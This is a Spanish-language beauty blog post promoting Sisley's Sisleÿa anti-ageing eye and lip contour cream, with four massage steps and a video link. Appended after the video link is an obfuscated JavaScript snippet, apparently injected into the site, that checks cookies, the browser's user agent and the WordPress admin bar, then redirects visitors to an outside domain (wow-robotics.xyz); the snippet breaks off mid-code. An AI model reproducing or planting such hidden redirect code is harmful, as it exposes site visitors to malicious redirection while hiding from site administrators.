¡Los ojos te delatan! Tu ritmo de vida, el estrés, el sol… estos son algunos factores que se reflejan directamente el área de los ojos, el área más vulnerable de tu cara. Hoy en nuestro blog te traemos una solución absoluta de la mano de Sisley Paris para combatir las “líneas del tiempo”.

SisleyBanner-5991c6ee71983
Progresivamente, pueden aparecer ojeras y bolsas que apagan la mirada, así como arrugas y líneas de expresión que arrugan los párpados y marcan el rostro. Sisley presenta Sisleÿa L’Intégral Anti-Âge un tratamiento que aporta una respuesta completa para luchar contra los signos visibles relacionados con los 3 tipos de envejecimiento: genéticos, ambientales y los provocados por el estilo de vida.

De una manera inmediata, el uso de este tratamiento en el contorno de ojos mejora la hidratación de la zona y la mirada luce más joven y luminosa. De manera prolongada, los resultados son visibles en cuanto a reducción de arrugas y líneas de expresión, la piel se reafirma y las ojeras se atenúan y las bolsas se reducen. Y en la parte de los labios se aprecia una boca más perfilada.

El tratamiento Sisleÿa L’Intégral Anti-Âge Crème contour des yeux et des lèvres incluye un utensilio de masaje que deberá utilizarse antes de la aplicación del tratamiento siguiendo estos pasos:

sisley

1 – Alisar debajo del ojo, a continuación, encima de la ceja y por último sobre el párpado, desde el interior hacia el exterior. Después, alisar la parte superior del labio desde el centro hacia el exterior.

2 – Realizar movimientos de presión para favorecer la microcirculación desde el interior hacia el exterior.

3 – Realizar movimientos de zigzag debajo del ojo así como en la zona del entrecejo.

4 – Realizar movimientos de vaivén en el ángulo externo del ojo para alisar las arrugas de la pata de gallo, en la zona del entrecejo y encima del labio.

Después, la aplicación del tratamiento es muy sencilla, como puedes ver en este vídeo. Sisley recomienda su uso por la mañana y la noche sobre el contorno de los ojos, párpado y contorno de los labios. ¿Te gustaría probarlo?

https://youtu.be/Q8QkWoJQ0jA var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone